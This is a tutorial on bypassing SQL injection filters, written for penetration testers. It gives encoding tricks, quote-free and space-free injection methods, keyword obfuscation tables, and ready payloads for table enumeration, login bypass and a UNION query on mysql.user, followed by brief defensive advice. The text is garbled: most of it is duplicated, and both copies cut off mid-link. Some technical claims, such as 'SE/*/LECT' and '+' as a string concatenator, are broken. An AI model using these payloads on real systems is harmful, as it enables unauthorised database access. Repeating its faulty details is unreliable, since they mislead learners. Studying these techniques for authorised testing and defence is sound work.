Understanding SQL Injection Filter Evasion Techniques

Web applications deploy input filters to block common SQL injection attacks, but sophisticated bypass techniques can circumvent these defenses. As a penetration tester, understanding these evasion methods is essential for identifying vulnerabilities in hardened systems and helping organizations strengthen their security posture.

Key Points

Character encoding transforms malicious payloads into alternative representations that bypass detection
Quote-free injection techniques exploit numerical contexts and SQL functions when quotes are filtered
Space replacement methods use comments, special characters, and parentheses to maintain query syntax
Keyword obfuscation employs case variation, encoding, and symbolic operators to evade blacklist filters
Defense requires parameterized queries, positive validation, and WAF deployment with custom rules

Character Encoding Techniques

Filters frequently fail to detect encoded payloads, allowing attackers to transform malicious input into alternative representations that slip through validation checks.

URL Encoding

Replace special characters with percent-encoded equivalents to bypass basic filters:

' becomes %27
(space) becomes %20
= becomes %3D

Example: ' OR 1=1-- transforms to %27%20OR%201%3D1--

Hexadecimal Encoding

Represent strings as hex values directly in SQL queries:

-- Instead of: SELECT * FROM users WHERE name = 'admin'
SELECT * FROM users WHERE name = 0x61646d696e

The hex value 0x61646d696e decodes to admin without using quotes.

Unicode Encoding

Use Unicode escape sequences to represent characters:

admin → \u0061\u0064\u006d\u0069\u006e

Pro Tip: Layer multiple encoding methods (URL + Unicode) to bypass nested filters that decode only once.

No-Quote SQL Injection

When single or double quotes are blocked by filters, alternative techniques can maintain injection effectiveness.

Numerical Context Exploitation

Exploit queries expecting numeric values where quotes aren't syntactically required:

-- Original: ' OR '1'='1
-- No-quote version: OR 1=1

SQL Comment Truncation

Use comment syntax (-- or #) to terminate queries early:

-- Blocked: admin'--
-- Alternative: admin-- (if quotes are stripped)

String Concatenation Functions

Build strings dynamically using SQL functions:

Function	Example	Result
`CONCAT()`	`CONCAT(0x61, 0x64, 0x6d, 0x69, 0x6e)`	`admin`
`CHAR()`	`CHAR(97,100,109,105,110)`	`admin`
Concatenation operator	`0x61+0x64+0x6d+0x69+0x6e`	`admin`

Space Bypass Methods

Space filtering is common but easily circumvented using alternative whitespace characters and SQL syntax tricks.

Inline Comments

Replace spaces with /**/ comment blocks:

SELECT/**/*/**/FROM/**/users

Alternative Whitespace Characters

Use URL-encoded whitespace alternatives:

%09 (horizontal tab)
%0A (line feed)
%0D (carriage return)
%A0 (non-breaking space)

Example: SELECT%0A*%0AFROM%0Ausers

Parentheses Grouping

Group expressions without requiring spaces:

SELECT(1)FROM(users)WHERE(id=1)

Keyword Obfuscation Strategies

SQL keyword blacklists can be bypassed through various obfuscation techniques.

Filter Target	Bypass Technique	Example
`SELECT`	Case variation	`SElEcT`, `sELeCt`
`SELECT`	Inline comments	`SE/*/LECT`, `SEL/comment*/ECT`
`UNION`	Hex encoding	`0x554E494F4E`
`AND` / `OR`	Symbolic operators	`&&` (AND), `\|\|` (OR)
`=`	Alternative comparisons	`LIKE`, `REGEXP`, `IN()`
Any keyword	String concatenation	`CONCAT('SE','LECT')`

Critical Note: Modern WAFs employ pattern recognition beyond simple keyword matching. Always test payloads incrementally and monitor responses.

Practical Attack Examples

Example 1: Bypassing Space and Keyword Filters

Scenario: Filter blocks spaces and the SELECT keyword

Payload:

SElEcT/**/1/**/FrOm/**/(SeLeCt/**/group_concat(table_name)/**/FrOm/**/information_schema.tables)a

Techniques used:

Case variation on SELECT and FROM
Inline comments (/**/) replacing spaces
Subquery aliasing with a

Example 2: Quote-Filtered Login Bypass

Scenario: Login form filters single and double quotes

Original attack:

username=admin&password=1'||'1'='1

Encoded bypass:

username=admin&password=1%27%7C%7C%271%27%3D%271

Alternative approach (using numeric context):

username=admin&password=1||1

Example 3: Multi-Layer Evasion

Scenario: WAF blocks common SQL keywords and special characters

Payload:

1%09UNION%09SELECT%091,CONCAT(0x75,0x73,0x65,0x72),3%09FROM%09mysql.user

Techniques combined:

Tab character (%09) for spaces
Hex encoding for sensitive strings
Case-sensitive keyword variation

Defensive Countermeasures

While this guide focuses on offensive techniques, understanding defense is crucial for comprehensive security testing.

Primary Defenses

Parameterized queries (prepared statements) separate SQL logic from data input
Positive input validation uses allowlists to permit only expected characters
Stored procedures with proper parameter handling reduce injection surface area
Least privilege database accounts limit damage from successful attacks

Detection and Monitoring

Web Application Firewalls (WAFs) with custom rules for encoding detection
Anomaly detection systems that identify unusual query patterns
Regular log audits for suspicious character sequences and encoding attempts
Rate limiting to slow down automated injection attempts

Testing Recommendations

Test all encoding combinations during security assessments
Verify that filters apply to all input vectors (headers, cookies, parameters)
Check for filter inconsistencies between application layers
Document bypass techniques discovered for remediation prioritization

Learn More

Official Documentation

OWASP SQL Injection Prevention Cheat Sheet - Comprehensive prevention strategies
MySQL String Functions - Reference for concatenation and encoding functions
OWASP Testing Guide: SQL Injection - Structured testing methodology

Books and In-Depth Resources

SQL Injection Attacks and Defense (Second Edition) by Justin Clarke - Comprehensive coverage of attack vectors and defenses
The Web Application Hacker's Handbook by Dafydd Stuttard and Marcus Pinto - Broader context of web application security testing

Hands-On Practice

PortSwigger SQL Injection Labs - Free interactive labs with progressive difficulty
[SQLmap](https://sqlmap.

Key Points

Character encoding transforms malicious payloads into alternative representations that bypass detection
Quote-free injection techniques exploit numerical contexts and SQL functions when quotes are filtered
Space replacement methods use comments, special characters, and parentheses to maintain query syntax
Keyword obfuscation employs case variation, encoding, and symbolic operators to evade blacklist filters
Defense requires parameterized queries, positive validation, and WAF deployment with custom rules

Character Encoding Techniques

Filters frequently fail to detect encoded payloads, allowing attackers to transform malicious input into alternative representations that slip through validation checks.

URL Encoding

Replace special characters with percent-encoded equivalents to bypass basic filters:

' becomes %27
(space) becomes %20
= becomes %3D

Example: ' OR 1=1-- transforms to %27%20OR%201%3D1--

Hexadecimal Encoding

Represent strings as hex values directly in SQL queries:

-- Instead of: SELECT * FROM users WHERE name = 'admin'
SELECT * FROM users WHERE name = 0x61646d696e

The hex value 0x61646d696e decodes to admin without using quotes.

Unicode Encoding

Use Unicode escape sequences to represent characters:

admin → \u0061\u0064\u006d\u0069\u006e

Pro Tip: Layer multiple encoding methods (URL + Unicode) to bypass nested filters that decode only once.

No-Quote SQL Injection

When single or double quotes are blocked by filters, alternative techniques can maintain injection effectiveness.

Numerical Context Exploitation

Exploit queries expecting numeric values where quotes aren't syntactically required:

-- Original: ' OR '1'='1
-- No-quote version: OR 1=1

SQL Comment Truncation

Use comment syntax (-- or #) to terminate queries early:

-- Blocked: admin'--
-- Alternative: admin-- (if quotes are stripped)

String Concatenation Functions

Build strings dynamically using SQL functions:

Function	Example	Result
`CONCAT()`	`CONCAT(0x61, 0x64, 0x6d, 0x69, 0x6e)`	`admin`
`CHAR()`	`CHAR(97,100,109,105,110)`	`admin`
Concatenation operator	`0x61+0x64+0x6d+0x69+0x6e`	`admin`

Space Bypass Methods

Space filtering is common but easily circumvented using alternative whitespace characters and SQL syntax tricks.

Inline Comments

Replace spaces with /**/ comment blocks:

SELECT/**/*/**/FROM/**/users

Alternative Whitespace Characters

Use URL-encoded whitespace alternatives:

%09 (horizontal tab)
%0A (line feed)
%0D (carriage return)
%A0 (non-breaking space)

Example: SELECT%0A*%0AFROM%0Ausers

Parentheses Grouping

Group expressions without requiring spaces:

SELECT(1)FROM(users)WHERE(id=1)

Keyword Obfuscation Strategies

SQL keyword blacklists can be bypassed through various obfuscation techniques.

Filter Target	Bypass Technique	Example
`SELECT`	Case variation	`SElEcT`, `sELeCt`
`SELECT`	Inline comments	`SE/*/LECT`, `SEL/comment*/ECT`
`UNION`	Hex encoding	`0x554E494F4E`
`AND` / `OR`	Symbolic operators	`&&` (AND), `\|\|` (OR)
`=`	Alternative comparisons	`LIKE`, `REGEXP`, `IN()`
Any keyword	String concatenation	`CONCAT('SE','LECT')`

Critical Note: Modern WAFs employ pattern recognition beyond simple keyword matching. Always test payloads incrementally and monitor responses.

Practical Attack Examples

Example 1: Bypassing Space and Keyword Filters

Scenario: Filter blocks spaces and the SELECT keyword

Payload:

SElEcT/**/1/**/FrOm/**/(SeLeCt/**/group_concat(table_name)/**/FrOm/**/information_schema.tables)a

Techniques used:

Case variation on SELECT and FROM
Inline comments (/**/) replacing spaces
Subquery aliasing with a

Example 2: Quote-Filtered Login Bypass

Scenario: Login form filters single and double quotes

Original attack:

username=admin&password=1'||'1'='1

Encoded bypass:

username=admin&password=1%27%7C%7C%271%27%3D%271

Alternative approach (using numeric context):

username=admin&password=1||1

Example 3: Multi-Layer Evasion

Scenario: WAF blocks common SQL keywords and special characters

Payload:

1%09UNION%09SELECT%091,CONCAT(0x75,0x73,0x65,0x72),3%09FROM%09mysql.user

Techniques combined:

Tab character (%09) for spaces
Hex encoding for sensitive strings
Case-sensitive keyword variation

Defensive Countermeasures

While this guide focuses on offensive techniques, understanding defense is crucial for comprehensive security testing.

Primary Defenses

Parameterized queries (prepared statements) separate SQL logic from data input
Positive input validation uses allowlists to permit only expected characters
Stored procedures with proper parameter handling reduce injection surface area
Least privilege database accounts limit damage from successful attacks

Detection and Monitoring

Web Application Firewalls (WAFs) with custom rules for encoding detection
Anomaly detection systems that identify unusual query patterns
Regular log audits for suspicious character sequences and encoding attempts
Rate limiting to slow down automated injection attempts

Testing Recommendations

Test all encoding combinations during security assessments
Verify that filters apply to all input vectors (headers, cookies, parameters)
Check for filter inconsistencies between application layers
Document bypass techniques discovered for remediation prioritization

Learn More

Official Documentation

OWASP SQL Injection Prevention Cheat Sheet - Comprehensive prevention strategies
MySQL String Functions - Reference for concatenation and encoding functions
OWASP Testing Guide: SQL Injection - Structured testing methodology

Books and In-Depth Resources

SQL Injection Attacks and Defense (Second Edition) by Justin Clarke - Comprehensive coverage of attack vectors and defenses
The Web Application Hacker's Handbook by Dafydd Stuttard and Marcus Pinto - Broader context of web application security testing

Hands-On Practice

PortSwigger SQL Injection Labs - Free interactive labs with progressive difficulty
[SQLmap](https://sqlmap.